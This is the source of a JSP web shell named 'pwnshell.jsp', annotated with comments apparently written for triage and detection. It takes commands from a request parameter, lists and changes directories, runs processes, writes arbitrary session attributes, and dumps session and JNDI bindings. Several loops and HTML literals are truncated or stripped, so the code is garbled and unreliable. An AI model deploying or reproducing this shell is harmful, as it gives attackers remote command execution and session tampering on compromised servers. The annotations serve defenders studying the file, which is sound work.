<% /* pwnshell.jsp - www.i0day.com */ %>
<%@page import="java.io.File"%>
<%@page import="java.util.List"%>
<%@page import="java.util.Date"%>
<%@page import="java.util.Arrays"%>
<%@page import="java.util.ArrayList"%>
<%@page import="java.io.IOException" %>
<%@page import="java.io.InputStream" %>
<%@page import="java.io.InputStreamReader" %>
<%@page import="java.io.BufferedReader" %>
<%@page import="java.net.InetAddress" %>
<%@page import="javax.naming.*" %>
<%@page import="javax.servlet.jsp.PageContext" %>
<%@page deferredSyntaxAllowedAsLiteral="true"%>
<%!
// JSP declaration block (<%! ... %>): these compile to fields of the generated
// servlet class, so a single instance of each is shared by every concurrent
// request. Nothing here is synchronized; overlapping requests race on them.
// Working directory used by cd()/ls(); also persisted per client in the "pwd" session attribute.
String currentDir = "";
// Request-scoped page context captured in the scriptlet below; show() reaches the request's session through it.
PageContext context;
// The requester's HttpSession, captured in the scriptlet below; written to by setSession().
HttpSession currentSession;
%>
<%
// Per-request dispatch. The working directory is persisted in the HTTP session
// under the "pwd" attribute; the first request of a session seeds it from user.dir.
if ( session.getAttribute("pwd") == null ) {
currentDir = new File(System.getProperty("user.dir")).getCanonicalPath();
session.setAttribute("pwd",currentDir);
} else {
currentDir = (String)session.getAttribute("pwd");
}
// Publish the request-scoped objects into the shared servlet fields declared above.
context = pageContext;
currentSession = session;
// The command line arrives in the "c" request parameter (getParameter reads both
// query string and form body). For detection, this parameter name and the page
// name are the indicators to look for in access logs and WAF rules.
String cmd = request.getParameter("c");
if ( cmd != null ) {
String result = processCmd(cmd);
// The result is written into the response verbatim by the <%= %> expression;
// only some helpers (cd, ls, jndi error path) pass their text through escape().
%><%=result%><%
// Re-persist the directory so a cd issued by this command survives to the next request.
session.setAttribute("pwd", new File(currentDir).getCanonicalPath());
return;
}
%>
pwnshell - an interactive jsp shell
<%!
private String processCmd(String cmdLine) {
String[] tokens = tokenize(cmdLine);
if ( tokens.length == 0 ) {
return "No command specified.";
}
String cmd = tokens[0];
String[] args = new String[tokens.length-1];
for(int i=1;i");
}
try {
p.waitFor();
} catch(InterruptedException e) { }
} catch (IOException ioe) {
java.io.StringWriter sw = new java.io.StringWriter();
java.io.PrintWriter pw = new java.io.PrintWriter(sw);
ioe.printStackTrace(pw);
pw.flush();
return replaceNewlines(sw.toString());
}
return sb.toString();
}
}
// "session set <key> <value> [class]": stores an attribute in the requester's own
// HttpSession and echoes it back via show(). Hosting applications commonly keep
// authentication and role state in session attributes, so this helper is the one
// to flag first when triaging this file.
private String setSession(String[] args) {
if ( args.length != 0 && "set".equals(args[0]) ) {
if ( args.length == 3 ) {
// Three tokens: the value is stored as a plain String.
String key = args[1];
String val = args[2];
currentSession.setAttribute(key,val);
return show( new String[]{"session", key} );
} else if ( args.length == 4 ) {
// Four tokens: the last one selects a boxed primitive wrapper for the value.
// A NumberFormatException from the valueOf() calls is not caught here and
// propagates to the caller.
String key = args[1];
String val = args[2];
String cls = args[3];
boolean foundCls = false;
if ( cls.equals("boolean") ) {
foundCls = true; currentSession.setAttribute(key, Boolean.valueOf(val));
} else if ( cls.equals("byte") ) {
foundCls = true; currentSession.setAttribute(key, Byte.valueOf(val));
} else if ( cls.equals("short") ) {
foundCls = true; currentSession.setAttribute(key, Short.valueOf(val));
} else if ( cls.equals("int") ) {
foundCls = true; currentSession.setAttribute(key, Integer.valueOf(val));
} else if ( cls.equals("long") ) {
foundCls = true; currentSession.setAttribute(key, Long.valueOf(val));
} else if ( cls.equals("float") ) {
foundCls = true; currentSession.setAttribute(key, Float.valueOf(val));
} else if ( cls.equals("double") ) {
foundCls = true; currentSession.setAttribute(key, Double.valueOf(val));
}
// Any other class name falls through to the usage text below.
if (foundCls)
return show( new String[]{"session", key} );
}
}
// Wrong arity or unknown class name: return the usage text.
// NOTE(review): the empty appends and the literals broken across lines look like
// HTML markup stripped from this copy — confirm against the original before relying on them.
StringBuilder sb = new StringBuilder();
sb.append("Usage:
");
sb.append("session set <key> <value> [class]
");
sb.append("The class option is assumed to be String, but can be substituted for any other primitive, e.g., 'int' or 'float'
");
sb.append("");
return sb.toString();
}
// "show session [key]" / "show jndi [key]": renders session attributes or
// java:comp/env JNDI bindings as a name | class | value table. Values are
// rendered with String.valueOf()/toString() and are NOT passed through escape(),
// so whatever those objects print is disclosed verbatim in the response.
// NOTE(review): the empty appends and literals broken across lines look like HTML
// markup stripped from this copy — confirm against the original.
private String show(String[] args) {
if ( args.length > 0 && "session".equals(args[0]) ) {
if ( args.length == 1 ) {
// Dump every attribute of the requester's session.
StringBuilder sb = new StringBuilder();
sb.append("");
sb.append("Key | Class | Value |
");
// Presumably the same session as the currentSession field; obtained via the
// page context here rather than the field — verify if the two ever diverge.
HttpSession session = ((HttpServletRequest)context.getRequest()).getSession();
java.util.Enumeration e = session.getAttributeNames();
while(e.hasMoreElements()) {
String key = (String)e.nextElement();
Object obj = session.getAttribute(key);
sb.append("");
sb.append(key);
sb.append(" | ");
sb.append(obj.getClass().getName());
sb.append(" | ");
sb.append(String.valueOf(obj));
sb.append(" | ");
}
sb.append("
");
return sb.toString();
} else if ( args.length == 2 ) {
// Single attribute lookup by name.
HttpSession session = ((HttpServletRequest)context.getRequest()).getSession();
String key = args[1];
Object obj = session.getAttribute(key);
StringBuilder sb = new StringBuilder();
sb.append("");
sb.append("Key | Class | Value |
");
if ( obj != null ) {
sb.append("");
sb.append(key);
sb.append(" | ");
sb.append(obj.getClass().getName());
sb.append(" | ");
sb.append(String.valueOf(obj));
sb.append(" | ");
} else {
sb.append("(key not found) | ");
}
sb.append("");
sb.append("
");
return sb.toString();
}
} else if ( args.length > 0 && "jndi".equals(args[0]) ) {
if ( args.length == 1 ) {
// Enumerate java:comp/env and look each binding up; any exception aborts the
// listing and the full stack trace is returned instead.
try {
StringBuilder sb = new StringBuilder();
sb.append("");
sb.append("JDNI Name | Class | Value |
");
InitialContext ic = new InitialContext();
NamingEnumeration ne = ic.listBindings("java:comp/env");
while(ne.hasMore()) {
NameClassPair ncPair = (NameClassPair)ne.next();
String key = ncPair.getName();
String cls = ncPair.getClassName();
sb.append("");
sb.append(key);
sb.append(" | ");
sb.append(cls);
sb.append(" | ");
sb.append(ic.lookup(key));
sb.append(" |
");
}
sb.append("
");
return sb.toString();
} catch (Exception e) {
java.io.StringWriter sw = new java.io.StringWriter();
java.io.PrintWriter pw = new java.io.PrintWriter(sw);
e.printStackTrace(pw);
pw.flush();
return replaceNewlines(sw.toString());
}
} else if ( args.length == 2 ) {
// Single JNDI lookup by name.
String key = args[1];
StringBuilder sb = new StringBuilder();
try {
InitialContext ic = new InitialContext();
// 'ne' is never read in this branch; the listBindings call is a wasted round trip.
NamingEnumeration ne = ic.listBindings("java:comp/env");
Object obj = ic.lookup(key);
sb.append("");
sb.append("JDNI Name | Class | Value |
");
if ( obj != null ) {
sb.append("");
sb.append(key);
sb.append(" | ");
sb.append(obj.getClass().getName());
sb.append(" | ");
sb.append(String.valueOf(obj));
sb.append(" | ");
} else {
sb.append("(key not found) | ");
}
sb.append("");
sb.append("
");
} catch (Exception e) {
// Only this error path escapes its output; the table rows above do not.
return replaceNewlines("" + escape(e.getMessage()) + "");
}
return sb.toString();
}
}
// Unrecognised sub-command or arity: usage text.
StringBuilder sb = new StringBuilder();
sb.append("Invalid syntax for 'show' command. Usage:
");
sb.append("show session [key]
");
sb.append("show jndi [key]
");
sb.append("");
return sb.toString();
}
// Changes the shared working directory. The argument is tried first relative to
// the current directory, then as-is (absolute or relative to the JVM's cwd).
// No containment check is applied: any directory visible to the servlet process
// is accepted. Returns "" on success or an escaped error message.
private String cd(String dir) {
try {
File d = new File(this.currentDir + File.separator + dir);
if ( d.exists() && d.isDirectory() ) {
this.currentDir = d.getCanonicalPath();
return "";
}
d = new File(dir);
if ( d.exists() && d.isDirectory() ) {
this.currentDir = d.getCanonicalPath();
return "";
}
// A getCanonicalPath() failure is swallowed and reported as "no such directory".
} catch (IOException ioe) { }
return "No such directory: " + escape(dir) + "";
}
// Returns the shared working directory as stored; note it is not passed through escape().
private String pwd() {
return this.currentDir;
}
private String ls(String[] args) {
boolean shouldL = false;
boolean shouldA = false;
List targets = new ArrayList();
for(int i=0;iOnly -l and -a (or -la/-al) are supported";
}
}
} else if ( ! new File(args[i]).exists() ) {
return "Cannot find specified file/directory: " + escape(args[i]) + "";
} else {
targets.add(args[i]);
}
}
if ( targets.size() == 0 ) {
String[] lst = new File(currentDir).list();
for(String entry : lst) {
targets.add(currentDir + File.separator + entry);
}
}
StringBuffer sb = new StringBuffer();
String entryLen;
sb.append("");
for(int i=0,ctr=0;i");
if ( f.isDirectory() ) {
String encoded = escape(f.getName());
sb.append("");
sb.append(encoded);
sb.append("/");
} else {
sb.append(escape(f.getName()));
}
sb.append("");
if ( shouldL || (ctr != 1 && (ctr % 3) == 0) ) {
if ( shouldL ) {
sb.append("");
sb.append(new Date(f.lastModified()));
sb.append(" | ");
char[] privs = new char[2];
privs[0] = f.canRead() ? 'R' : '-';
privs[1] = f.canWrite() ? 'W' : '-';
//privs[2] = f.canExecute() ? 'X' : '-'; canExecute() was introduced in 1.6
sb.append(new String(privs));
sb.append(" | ");
sb.append(f.length());
sb.append(" | ");
}
sb.append("
");
if ( i != targets.size() - 1 ) {
sb.append("");
}
}
}
sb.append("
");
return sb.toString();
}
// tokenize() helper: moves the token accumulated in buf into resultBuffer and
// clears buf. An empty buf produces no token, so empty tokens are dropped.
private void appendToBuffer(List resultBuffer, StringBuffer buf) {
if (buf.length() > 0) {
resultBuffer.add(buf.toString());
buf.setLength(0);
}
}
// Splits a command line into tokens, shell-style: whitespace separates tokens
// outside double quotes; a double quote toggles quoting and also flushes the
// token in progress (so abc"def" yields two tokens); backslash escapes only a
// following '"' or '\', any other backslash is kept literally. Empty tokens are
// dropped and an unterminated quote is not an error. A null input yields an
// empty array.
private String[] tokenize(String commandLine) {
List resultBuffer = new java.util.ArrayList();
if (commandLine != null) {
int z = commandLine.length();
boolean insideQuotes = false;
StringBuffer buf = new StringBuffer();
for (int i = 0; i < z; ++i) {
char c = commandLine.charAt(i);
if (c == '"') {
// Flush before toggling: a quote always ends the token in progress.
appendToBuffer(resultBuffer, buf);
insideQuotes = !insideQuotes;
} else if (c == '\\') {
if ((z > i + 1)
&& ((commandLine.charAt(i + 1) == '"')
|| (commandLine.charAt(i + 1) == '\\'))) {
// Escaped quote or backslash: keep the escaped character, skip the escape.
buf.append(commandLine.charAt(i + 1));
++i;
} else {
buf.append("\\");
}
} else {
if (insideQuotes) {
buf.append(c);
} else {
if (Character.isWhitespace(c)) {
appendToBuffer(resultBuffer, buf);
} else {
buf.append(c);
}
}
}
}
// Emit the trailing token, if any.
appendToBuffer(resultBuffer, buf);
}
String[] result = new String[resultBuffer.size()];
return ((String[]) resultBuffer.toArray(result));
}
private String escape(String s) {
StringBuilder sb = new StringBuilder();
for(int i=0;i' )
sb.append("<");
else if ( c == '"' )
sb.append(""");
else if ( c == '&' )
sb.append("&");
else
sb.append(c);
}
return sb.toString();
}
// Rewrites the platform line separator in output text (stack traces, usage text)
// for the response. The separator is handed to replaceAll() as a regex, so the
// behaviour is platform dependent: on a "\r\n" platform, bare "\n" in the input
// is left untouched. Null is passed through unchanged.
// NOTE(review): the literal broken across the two lines below looks like stripped
// HTML markup in this copy — confirm against the original.
private String replaceNewlines(String s) {
if ( s == null ) return null;
return s.replaceAll(System.getProperty("line.separator"),"
");
}
// Resolves a bare executable name against the PATH environment variable and
// returns the first matching absolute path, or null if no directory contains it.
// Only isFile() is checked, not executability. If PATH is unset, getenv() returns
// null and the split() below throws NullPointerException.
private String getExecutableFromPath(String executableName) {
String systemPath = System.getenv("PATH");
String[] pathDirs = systemPath.split(File.pathSeparator);
String fullyQualifiedExecutable = null;
for (String pathDir : pathDirs) {
File file = new File(pathDir, executableName);
if (file.isFile()) {
fullyQualifiedExecutable = file.getAbsolutePath();
break;
}
}
return fullyQualifiedExecutable;
}
%>